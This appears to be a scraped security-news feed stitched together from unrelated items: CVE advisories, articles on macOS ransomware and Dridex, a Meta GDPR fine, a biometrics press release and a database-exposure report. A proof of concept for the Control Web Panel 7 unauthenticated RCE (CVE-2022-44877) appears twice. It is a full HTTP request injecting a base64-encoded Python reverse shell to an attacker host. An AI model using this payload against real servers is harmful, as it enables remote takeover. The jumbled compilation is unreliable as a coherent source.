Control Web Panel 7 versions prior to 0.9.8.1147 suffer from an unauthenticated remote code execution vulnerability.

    [+] Centos Web Panel 7 Unauthenticated Remote Code Execution[+] Centos Web Panel 7 - < 0.9.8.1147[+] Affected Component ip:2031/login/index.php?login=$(whoami)[+] Discoverer: Numan Türle @ Gais Cyber Security[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194[+] CVE: CVE-2022-44877Description--------------Bash commands can be run because double quotes are used to log incorrect entries to the system.Video Proof of Concept--------------https://www.youtube.com/watch?v=kiLfSvc1SYYProof of concept:--------------POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1Host: 10.13.37.10:2031Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82Content-Length: 40Origin: https://10.13.37.10:2031Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://10.13.37.10:2031/login/index.php?login=failedAccept-Encoding: gzip, deflateAccept-Language: enConnection: closeusername=root&password=toor&commit=Login--------------Solution--------Upgrade to CWP7 current version.

Control Web Panel 7 Remote Code Execution

JFrog Artifactory prior to 7.37.13 is vulnerable to Authentication Bypass, which can lead to Privilege Escalation when a specially crafted request is sent by an unauthenticated user.

****How to fix******Cloud Environments**

Affected Cloud environments have already been fortified with a fixed version.  
No action is required for cloud instances.  

**Self Hosted Environments**

**To fix this issue, there is required action**.  
  
Upgrade your version of Artifactory or Edge to one of the versions listed below:

****Exploitation Status****

JFrog is not aware of publicly available exploits and malicious exploitation attempts.

****Weakness Type****

CWE-274: Improper Handling of Insufficient Privileges

****Acknowledgements****

This issue was discovered and reported by Matthias Kaiser and Jonni Passki of Apple Information Security.

****We Are Here For Your Questions (JFrog Support Team)****

If you have questions or concerns regarding this advisory, please raise a support request at JFrog support portal.

CVE-2022-0668: CVE-2022-0668: Artifactory Authentication Bypass - JFrog

Microsoft has shed light on four different ransomware families – KeRanger, FileCoder, MacRansom, and EvilQuest – that are known to impact Apple macOS systems.
"While these malware families are old, they exemplify the range of capabilities and malicious behavior possible on the platform," the tech giant's Security Threat Intelligence team said in a Thursday report.
The initial vector for these

Endpoint Security / Cyber Threat

Microsoft has shed light on four different ransomware families – KeRanger, FileCoder, MacRansom, and EvilQuest – that are known to impact Apple macOS systems.

"While these malware families are old, they exemplify the range of capabilities and malicious behavior possible on the platform," the tech giant's Security Threat Intelligence team said in a Thursday report.

The initial vector for these ransomware families involves what the Windows maker calls "user-assisted methods," wherein the victim downloads and installs trojanized applications.

Alternatively, it can also arrive as a second-stage payload that's dropped by an already existing malware on the infected host or as part of a supply chain attack.

Irrespective of the modus operandi employed, the attacks proceed along similar lines, with the threat actors relying on legitimate operating system features and exploiting vulnerabilities to break into the systems and encrypt files of interest.

This includes the use of the Unix find utility as well as library functions like opendir, readdir, and closedir to enumerate files. Another method pointed out by Microsoft, but not adopted by the ransomware strains, entails the NSFileManager Objective-C interface.

KeRanger, MacRansom, and EvilQuest have also been observed to utilize a combination of hardware- and software-based checks to determine if the malware is running in a virtual environment in an attempt to resist analysis and debugging attempts.

KeRanger, notably, employs a technique known as delayed execution to escape detection. It achieves this by sleeping for three days upon its launch before kick-starting its malicious functions.

Persistence, which is essential to ensuring that the malware is run even after a system restart, is established by means of launch agents and kernel queues, Microsoft pointed out.

While FileCoder uses the ZIP utility to encrypt files, KeRanger uses AES encryption in cipher block chaining (CBC) mode to achieve its goals. Both MacRansom and EvilQuest, on the other hand, leverage a symmetric encryption algorithm.

EvilQuest, which was first exposed in July 2020, further goes beyond typical ransomware to incorporate other trojan-like features, such as keylogging, compromising Mach-O files by injecting arbitrary code, and disabling security software.

It also packs in capabilities to execute any file directly from memory, effectively leaving no trace of the payload on disk.

"Ransomware continues to be one of the most prevalent and impactful threats affecting organizations, with attackers constantly evolving their techniques and expanding their tradecraft to cast a wider net of potential targets," Microsoft said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Reveals Tactics Used by 4 Ransomware Families Targeting macOS

A variant of the infamous Dridex banking malware has set its sights on Apple's macOS operating system using a previously undocumented infection method, according to latest research.
It has "adopted a new technique to deliver documents embedded with malicious macros to users without having to pretend to be invoices or other business-related files," Trend Micro researcher Armando Nathaniel

A variant of the infamous Dridex banking malware has set its sights on Apple's macOS operating system using a previously undocumented infection method, according to latest research.

It has "adopted a new technique to deliver documents embedded with malicious macros to users without having to pretend to be invoices or other business-related files," Trend Micro researcher Armando Nathaniel Pedragoza said in a technical report.

Dridex, also called Bugat and Cridex, is an information stealer that's known to harvest sensitive data from infected machines and deliver and execute malicious modules. It's attributed to an e-crime group known as Evil Corp (aka Indrik Spider).

The malware is also considered to be a successor of Gameover Zeus, itself a follow-up to another banking trojan called Zeus. Previous Dridex campaigns targeting Windows have leveraged macro-enabled Microsoft Excel documents sent via phishing emails to deploy the payload.

Trend Micro's analysis of the Dridex samples involves a Mach-O executable file, the earliest of which was submitted to VirusTotal in April 2019. Since then, 67 more artifacts have been detected in the wild, some as recent as December 2022.

The artifact, for its part, contains a malicious embedded document – first detected way back in 2015 – that incorporates an Auto-Open macro that's automatically run upon opening the document.

This is achieved by overwriting all ".doc" files in the current user directory (~/User/{user name}) with the malicious code extracted from the Mach-O executable in the form of a hexadecimal dump.

"While the macro feature in Microsoft Word is disabled by default, the malware will overwrite all the document files for the current user, including the clean files," Pedragoza explained. "This makes it more difficult for the user to determine whether the file is malicious since it doesn't come from an external source."

The macros included in the overwritten document are engineered to contact a remote server to retrieve additional files, which includes a Windows executable file that will not run in macOS, indicating that the attack chain is a work in progress. The binary, in turn, attempts to download the Dridex loader onto the compromised machine.

While documents containing booby-trapped macros are typically delivered via social engineering attacks, the findings once again show that Microsoft's decision to block macros by default has prompted threat actors to refine their tactics and find more efficient methods of entry.

"Currently, the impact on macOS users for this Dridex variant is minimized since the payload is an exe file (and therefore not compatible with MacOS environments)," Trend Micro said. "However, it still overwrites document files which are now the carriers of Dridex's malicious macros."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Dridex Malware Now Attacking macOS Systems with Novel Infection Method

RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.

\# Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877

\[+\] Centos Web Panel 7 Unauthenticated Remote Code Execution

\[+\] Centos Web Panel 7 - < 0.9.8.1147

\[+\] Affected Component ip:2031/login/index.php?login=$(whoami)

\[+\] Discoverer: Numan Türle @ Gais Cyber Security

\[+\] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194

\## Proof of concept:

POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1

Host: 10.13.37.10:2031

Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82

Content-Length: 40

Origin: https://10.13.37.10:2031

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: https://10.13.37.10:2031/login/index.php?login=failed

Accept-Encoding: gzip, deflate

Accept-Language: en

Connection: close

username=root&password=toor&commit=Login

\## Solution

Upgrade to CWP7 current version.

CVE-2022-44877: # Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877

Encrypting data while in use, not just in transit and at rest, closes one more avenue of cyberattack.

Digital transformation initiatives, spurred by COVID-19, are helping companies scale new heights in efficiency and productivity. However, they have also highlighted to enterprise leaders the need for tighter cybersecurity measures — especially as attackers continue to ride the wave of new technologies to launch sophisticated attacks. The number of records exposed in data breaches consistently went up throughout 2022 — 3.33 million records in the first quarter of 2022, 5.54 million records in the second quarter, and 14.78 million records in the third quarter — according to data from Statista.

Organizations face various challenges as they grapple with managing and securing the explosion of data created, in part, by remote environments. This, coupled with the lack of visibility across dispersed networks and growing migration to the cloud, has increased the risk of attacks across multiple industries, including healthcare, financial services, and decentralized finance (DeFi).

Confidential computing segregates data and code from the host computer's system and makes it harder for unauthorized third parties to access the data. The way that confidential computing protects sensitive data could smooth the way for increased cloud adoption in highly regulated sectors such as finance and healthcare, according to Gartner.

As more organizations handle large volumes of data, ushering in a greater need for privacy and data security, confidential computing is poised to close that security gap by ensuring data remains confidential at all times — while at rest, in transit, and in use.

**A Different Approach to Cybersecurity**

Most encryption schemes focus on protecting while at rest, or while in transit. Confidential computing protects data while in use — by allowing data to remain encrypted even as it’s being processed and used in applications. The market for confidential computing is expected to grow up to $54 billion by 2026, according to a report by Everest Group.

"Everybody wants to continue to reduce the attack surface of data. Up to this point, it is obviously encrypted in transit and at rest. Confidential computing solves the encrypted in-use at the infrastructure level," said Justin Boitano, vice president and general manager of Nvidia's enterprise and edge computing operations, in a previous article on Dark Reading.

Anil Rao, vice president and general manager for systems architecture and engineering at Intel's office of the chief technology officer, also noted in the article that confidential computing will also help enterprises build a new class of applications where third-party data sets can mingle with proprietary data sets in a secure area to create better learning models.

The hardware element of confidential computing makes it uniquely secure, says Jay Harel, VP of product at Opaque Systems. "A hacker must literally crack the CPU open and tap into the silicon die in order to steal any confidential data," Harel says. "Most data breaches happen remotely, over the Internet. Confidential computing requires physical access to the hardware, making a breach much less likely."

Cloud vendors Microsoft Azure and Google Cloud make confidential computing available through CPUs from Intel and AMD, while Amazon AWS uses its own Nitro technology. "I wouldn't say that the hardware is fully mainstream yet, as most compute resources offered by these vendors still don't have confidential computing capabilities," Harel notes.

As Noam Dror, senior vice president of solution engineering at Hub Security, puts it, "Today, when hackers get past standard security controls, they can access data in use which is totally exposed and unencrypted. Existing cybersecurity measures have a hard time dealing with these issues. This is where confidential computing comes in, providing comprehensive cyber protection across all levels. These most sensitive data must be protected leveraging confidential computing because the computing environment will always be vulnerable."

**Helps Industries Share Data Securely**

The confidential computing approach to cybersecurity offers several advantages, particularly in sectors where client or patient data is highly sensitive and regulated — like the healthcare sector, for example. In such sectors, confidential computing can enable secure multiparty training of AI for different purposes and ensure data privacy.

Cloud security company Fortanix says that financial services in particular should invest in confidential computing, for several reasons: it involves masses of personally identifiable information (PII), it is heavily regulated, its monetary value attracts attention from cyber criminals, and "it's an industry that hasn't figured out a secure way to share valuable data among each other that can be used to detect fraud or money laundering," a Fortanix spokesperson says. Fortanix adds it is also seeing interest in confidential computing from industries with similar characteristics, such as healthcare enterprises and government entities.

"Confidential computing reduces the trusted computing base to the minimum. It takes the trust away from configuration files, and secrets and passwords managed by humans, which can be error-prone. The trust circle is reduced to the CPU, and the application, and everything in between — the operating system, the network, the administrators, can be removed from that trust circle. Confidential computing gets closest to achieving zero trust when establishing communication between app-to-app or machine-to-machine," Fortanix says.

**Complete Control Over Data**

Today's protective solutions are insufficient and leave critical data exposed. Cloud providers AMD, Intel, Google Cloud, Microsoft Azure, Amazon Web Services, Red Hat, and IBM have already deployed confidential computing offerings. A growing number of cybersecurity companies, including Fortinet, Anjuna Security, Gradient Flow, and Hub Security, are also providing such solutions.

Harel says, "Confidential computing is a natural addition to their security arsenal, allowing them to evolve their breach defense and take it to the next level. It allows them to finally protect data in use, after spending decades and billions of dollars protecting data at rest and in transit."

Nataraj Nagaratnam, IBM distinguished engineer and CTO for cloud security, believes that confidential computing is a game-changer, especially because it gives customers complete control of their data. "Confidential computing primarily aims to provide greater assurance to companies that their data in the cloud is protected and confidential. It encourages companies to move more of their sensitive data and computing workloads to public cloud services," he notes.

How Confidential Computing Can Change Cybersecurity

The Irish Data Protection Commission (DPC) has fined Meta Platforms €390 million (roughly $414 million) over its handling of user data for serving personalized ads in what could be a major blow to its ad-fueled business model.
To that end, the privacy regulator has ordered Meta Ireland to pay two fines – a €210 million ($222.5 million) fine over violations of the E.U. General Data Protection

Privacy / Data Protection

The Irish Data Protection Commission (DPC) has fined Meta Platforms €390 million (roughly $414 million) over its handling of user data for serving personalized ads in what could be a major blow to its ad-fueled business model.

To that end, the privacy regulator has ordered Meta Ireland to pay two fines – a €210 million ($222.5 million) fine over violations of the E.U. General Data Protection Regulation (GDPR) related to Facebook, and a €180 million ($191 million) for similar violations in Instagram.

The latest enforcement comes in the wake of concerns that the social media company used its Terms of Service to gain users' forced consent to allow targeted advertising based on their online activity. The complaints were filed on May 25, 2018, the date when GDPR came into effect in the region.

It also arrives a month after the European Data Protection Board (EDPB), an independent body that oversees the consistent application of GDPR in the E.U., announced that it had reached binding decisions with regards to the matter.

The DPC ruling means that Meta is no longer allowed to rely on contracts – i.e., accepting its Terms of Service – as a legal basis for processing personal data for behavioral advertising, effectively deeming the company's advertising practices illegal.

"Meta Ireland is not entitled to rely on the 'contract' legal basis in connection with the delivery of behavioral advertising as part of its Facebook and Instagram services, and that its processing of users' data to date, in purported reliance on the 'contract' legal basis, amounts to a contravention of Article 6 of the GDPR," the DPC said.

While Meta has argued that tailoring the ads it offers based on data it has about users' online behavior is a necessary part of the personalized service it offers, the company has three months to bring its data processing operations into compliance.

"Instead of having a 'yes/no' option for personalized ads, they just moved the consent clause in the terms and conditions," NOYB's Max Schrems, whose privacy non-profit filed the original complaint against Meta, said. "This is not just unfair but clearly illegal."

Meta, which has already suffered a decline in ad revenue over the past year in part due to Apple's privacy changes in iOS last year that require apps to ask for permission before tracking users, said it was "disappointed" by the decision and that it "strongly" believes its approach respects GDPR. The firm intends to appeal the DPC's findings.

"It's important to note that these decisions do not prevent personalized advertising on our platform," the company pointed out. "The decisions relate only to which legal basis Meta uses when offering certain advertising."

The tech giant further characterized the suggestion that it can no longer offer personalized ads to European users without their opt-in approval as "incorrect," stating there has been a lack of regulatory clarity on the issue.

These new financial penalties add to a pile of privacy fines for Meta in Europe and the U.S. last year. In late December 2022, it also agreed to pay $725 million to settle a class-action lawsuit that accused the company of giving third-parties access to user data without their permission.

The class action lawsuit was prompted in 2018 after Facebook disclosed that the information of 87 million users was improperly shared with Cambridge Analytica, a British political consultancy firm that used the harvested data to inform political campaigns.

**Apple is fined €8 million by France's CNIL**

In a related development, France's privacy watchdog, the Commission nationale de l'informatique et des libertés (CNIL), has hit Apple with a €8 million fine for not obtaining iPhone users' consent in iOS 14.6 prior to using identifiers to present targeted ads.

"In addition, the user had to perform a large number of actions to disable this setting since this possibility was not integrated into the initialization path of the phone," the agency said.

Apple said it plans to appeal the case, noting that it provides users "with a clear choice as to whether or not they would like personalized ads." It also stated that the service only relies on first-party data.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Irish Regulators Fine Facebook $414 Million for Forcing Users to Accept Targeted Ads

Versions of the package window-control before 1.4.5 are vulnerable to Command Injection via the sendKeys function, due to improper input sanitization.

@@ -15,6 +15,12 @@ const linuxGetWindowList = path.join(\_\_dirname, 'linux', 'getWindowList.sh') const macGetWindowList \= path.join(\_\_dirname, 'mac', 'getWindowList.applescript') const winGetWindowList \= path.join(\_\_dirname, 'windows', 'listOpenWindows.bat')  
const sanitiseUserInput \= (input) \=> { let newInput \= (' ' + input).slice(1) newInput \= newInput.replaceAll("'", ""); return newInput }  
/\*\* \* Focuses the first window of the process with the PID given \* @param {integer} id PID to use to find the application window @@ -63,7 +69,7 @@ const sendKeys = (id, keys, {resetFocus = false, pressEnterOnceDone = true} = {} keys \= keys.replace('"', '\\\\"')  
if ( process.platform \=== 'darwin' ) { exec(\`osascript "${macFocusAndSendKeys}" ${id} "${keys}" ${resetFocus} ${pressEnterOnceDone}\`, (error, stdout, stderr) \=> { exec(\`osascript "${macFocusAndSendKeys}" '${sanitiseUserInput(id)}' '${sanitiseUserInput(keys)}' ${resetFocus} ${pressEnterOnceDone}\`, (error, stdout, stderr) \=> { if (error) reject(error) if (stderr) reject(stderr) resolve(stdout) @@ -76,7 +82,7 @@ const sendKeys = (id, keys, {resetFocus = false, pressEnterOnceDone = true} = {} keys \= keys + '~' }  
exec(\`${winSendKeysToWindowName} "${windowTitle}" "${keys}"\`, (error, stdout, stderr) \=> { exec(\`${winSendKeysToWindowName} '${sanitiseUserInput(windowTitle)}' '${sanitiseUserInput(keys)}'\`, (error, stdout, stderr) \=> { if (error) reject(error) if (stderr) reject(stderr) resolve(stdout) @@ -86,7 +92,7 @@ const sendKeys = (id, keys, {resetFocus = false, pressEnterOnceDone = true} = {} // TODO: add option to reset focus on linux // TODO: add option to not press enter once keys have been sent const windowID \= id // although the function calls it pid, iin this case it's a windowID exec(\`${sendTextToWindowWithId} ${windowID} "${keys}"\`, (error, stdout, stderr) \=> { exec(\`${sendTextToWindowWithId} '${sanitiseUserInput(windowID)}' '${sanitiseUserInput(keys)}'\`, (error, stdout, stderr) \=> { if (error) reject(error) if (stderr) reject(stderr) resolve(stdout) @@ -199,4 +205,4 @@ module.exports = { focusWindow: focusWindow, sendKeys: sendKeys, getWindowList: getWindowList, } }

CVE-2022-25926: fix: add sanitisation to user input · bruno-robert/window-control@075c854

**DUBLIN****,** **Jan. 4, 2023** **/PRNewswire/ --** The "Global Mobile Biometrics Market Size, Share & Industry Trends Analysis Report By Industry, By Technology, By Authentication Mode (Single Factor and Multi Factor), By Component (Hardware, Software and Service), By Regional Outlook and Forecast, 2022 - 2028" report has been added to  ResearchAndMarkets.com's offering.

The Global Mobile Biometrics Market size is expected to reach $91.9 billion by 2028, rising at a market growth of 21.8% CAGR during the forecast period.  
Mobile biometric authentication uses biometrics to recognize and confirm a person's identity when they attempt to access any mobile application. Authentication can be carried out using these mobile biometric devices in a number of different ways, including face recognition, fingerprint readers, voice recognition, and others. Mobile biometrics solutions straddle the line between identity and connectivity.  
They make use of smartphones, tablets, other forms of handheld devices, wearable technologies, and Internet of Things devices for their flexible deployment capabilities. Controlling access to information, locations, and systems have become more and more necessary over time. Many businesses currently use cards, PINs, or passwords to verify users' identities before granting access. However, there are significant problems with this conventional method.  
In recent years, biometric technology has gained popularity on mobile devices. The technology improved in terms of user-friendliness and consumer affordability. This biometric solution is a method used to authenticate a person who is in possession of a mobile device and uses it as a distinctive biometric identifier. Single-factor authentication (SFA) and multi-factor authentication (MFA) are the two different authentication mechanisms used by mobile biometric systems.  
These systems operate using a variety of techniques, including Deep Neural Networks and Keystroke Dynamics. Together, these procedures form a mobile biometrics system that provides coordinated security for mobile devices. The demand for this effective security solution typically increases significantly. In order to determine similarity, biometric authentication compares data for a person's features to that person's biometric "template".  
**COVID-19 Impact Analysis**  
The pandemic had a positive impact on the mobile biometrics market. This was due to a significant shift toward the rise of digital stores and e-commerce platforms, which has led to an increase in the use of online payments. The potential for an increase in cyberattacks in the form of fraud and identity theft also guided the market. Secure authentication services for different banking and financial applications, like client KYC and money transfer, are required in such a situation, and the usage of top-notch security tools is crucial.  
**Market Growth Factors**

**Increase In Platforms Using Biometric Authentication**  
The demand for biometric solutions has increased over the past few years as digital media and internet content delivery have grown. Traditional methods of authentication, like signatures and text-based credentials, have been shown to be more difficult for users to use because they are so vulnerable to contemporary cyberattacks. Furthermore, customers really need to develop faster methods of authentication due to the growing quantity of digital services.  
**Assurance Of Higher Security With Biometrics Usage**  
One of the key factors propelling the growth of mobile biometrics is the increasing demand for intelligence security devices in mobile devices to secure the data saved in the devices, such as bank account information, photos, recordings, contacts, and other personalized data. By confirming a physical, real-world characteristic that is (typically) specific to that person, such as fingerprints, facial features, voice articulation, and others, biometric solutions can give providers a higher level of assurance that the person is real.  
**Market Restraining Factors**

**Wrong And Inaccurate Results Through Biometrics**  
False positives and inaccuracy are two of the most significant challenges. Biometric authentication procedures rely on insufficient data to confirm a user's identity. For instance, during the enrollment step, a mobile biometric device will scan a whole fingerprint and turn it into data. Future fingerprint biometric authentication, however, will only require a portion of the print to confirm identity, making the process speedier overall.

**Scope of the Study**

**Market Segments Covered in the Report:**

**By Industry**

*   Public Sector
*   BFSI
*   Healthcare
*   IT & Telecommunication
*   Others

**By Technology**

*   Fingerprint Recognition
*   Face Recognition
*   Voice Recognition
*   Others

**By Authentication Mode**

*   Single Factor
*   Multi Factor

**By Component**

*   Hardware
*   Software
*   Service

**By Geography**

*   North America
*   US
*   Canada
*   Mexico
*   Rest of North America
*   Europe
*   Germany
*   UK
*   France
*   Russia
*   Spain
*   Italy
*   Rest of Europe
*   Asia Pacific
*   China
*   Japan
*   India
*   South Korea
*   Singapore
*   Malaysia
*   Rest of Asia Pacific
*   LAMEA
*   Brazil
*   Argentina
*   UAE
*   Saudi Arabia
*   South Africa
*   Nigeria
*   Rest of LAMEA

**Key Market Players**

**List of Companies Profiled in the Report:**

*   3M Company
*   Apple Inc.
*   NEC Corporation
*   BIO-key International, Inc.
*   Fujitsu Limited
*   HID Global Corporation
*   Precise Biometrics AB
*   M2SYS Technology, Inc.
*   Aware, Inc.

For more information about this report visit https://www.researchandmarkets.com/r/vwb2z6

Insights On the Mobile Biometrics Global Market To 2028 - Increase In Platforms Using Biometric Authentication Drives Growth

By Waqas
Apparently, the server belongs to a company based in the US with offices around the globe including India.
This is a post from HackRead.com Read the original post: Top ERP Firm Exposing Half a Million Indian Job Seekers Data

At the time of writing, a misconfigured server belonging to an Enterprise Resource Planning (ERP) Software provider based in California, United States was still exposing data to public without any security authentication or password.

An **Elasticsearch server** belonging to a major international IT recruitment and software solution provider is currently exposing the personal data of more than half a million Indian candidates looking for jobs.

However, the data is not limited to jobseeker as the server is also exposing the company’s employees’ data. Another important aspect of this data exposure is the fact that it also contains the company’s client records from different companies, including Apple and Samsung.

This was confirmed to Hackread.com by **Anurag Sen**, a prominent independent security researcher. What is worse, the server is still exposed and publicly accessible without any security authentication or password. Originally, the server was being exposed since late December 2022.

It all started when Anurag scanned for **misconfigured databases on Shodan** and noted a server exposing more than 6GB worth of data to public access. Anurag said that the server belongs to a company originally based in the United States with offices around the globe  
including India. Whilst the database contains details of job seekers in **India**.

Hackread.com would not share the name of the company in this article because the server is still exposed.

**Exposed Data**

Anurag’s analysis of the server revealed that the exposed records contain personal data of over 575,000 individuals, while the size of the data is over 6.3GB and increasing with new data with each day passing. This data includes the following:

*   Full Name
*   Date of birth
*   Email address
*   Phone number
*   Resume details
*   Employer details

The screenshot below shows the candidate details and client data that are currently being exposed:

Image credit: Anurag Sen – Hackread.com

The screenshot below was taken from the live server that shows the company’s client details. Some of these are top companies Apple, Samsung, Sandisk, Unilog, Moody, Intuit, NEC Corporation, Falabella and many more.

The company’s client list also indicates that its a high-profile business with a presence all over the globe.

Screenshot credit: Anurag Sen – Hackread.com

**Indian CERT Alerted**

Since the server is still live at the time of writing; Anurag alerted the Indian Computer Emergency Response Team over the weekend. However, there has been no response from the authorities yet.

**India and server misconfiguration**

India is home to almost 1.4 billion people. This makes the country a lucrative target for businesses as well as cybercriminals. The more the investment, the more widespread and vulnerable the IT infrastructure becomes.

Last year, several top data exposure-related incidents involving tens of millions of victims were reported from India. These included **Indian Federal Police and banking records**, **Covid antigen test results**, **MyEasyDocs**, online packaging marketplace **Bizongo**, etc.

**Impact**

It is yet unclear whether a third party accessed the database **with malicious intent**, such as ransomware gangs or threat actors. However, if it did, it would be devastating for the victim and the healthcare firm responsible for the server.

Furthermore, considering the extent and nature of the exposed data, the incident can have far-reaching implications, such as bad actors downloading the data, carrying out phishing scams, or identity theft-related fraud.

Hackers can hold the company’s server or **data for ransom** and leak it on cybercrime forums if their demands are not met. Nevertheless, the victims in this situation are the job hunters who trusted authorities with their personal information.

**Misconfigured Databases – Threat to Privacy**

Misconfigured or unsecured databases, as we know it, have become a major privacy threat to companies and unsuspected users. **In 2020**, researchers identified over 10,000 unsecured databases that exposed more than ten billion (10,463,315,645) records to public access without any security authentication. 

**In 2021**, the number increased to 399,200 exposed databases. The top 10 countries with top database leaks due to misconfiguration in 2021 included the following:

*   USA – 93,685 databases
*   China – 54,764 databases
*   Germany – 11,177 databases
*   France – 9,723 databases
*   India – 6,545 databases
*   Singapore – 5,882 databases
*   Hong Kong – 5,563 databases
*   Russia – 5,493 databases
*   Japan – 4,427 databases
*   Italy – 4,242 databases

1.  **Hackers claim to be selling 13TB of Domino’s India data**
2.  **Hackers leak data of 29 million Indian job seekers for download**
3.  **India’s COVID-19 surveillance tool exposed millions of user data**
4.  **Hackers leak millions of Airtel India user data with Aadhaar numbers**
5.  **9,517 unsecured databases identified with 10 billion records globally**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Tag

#apple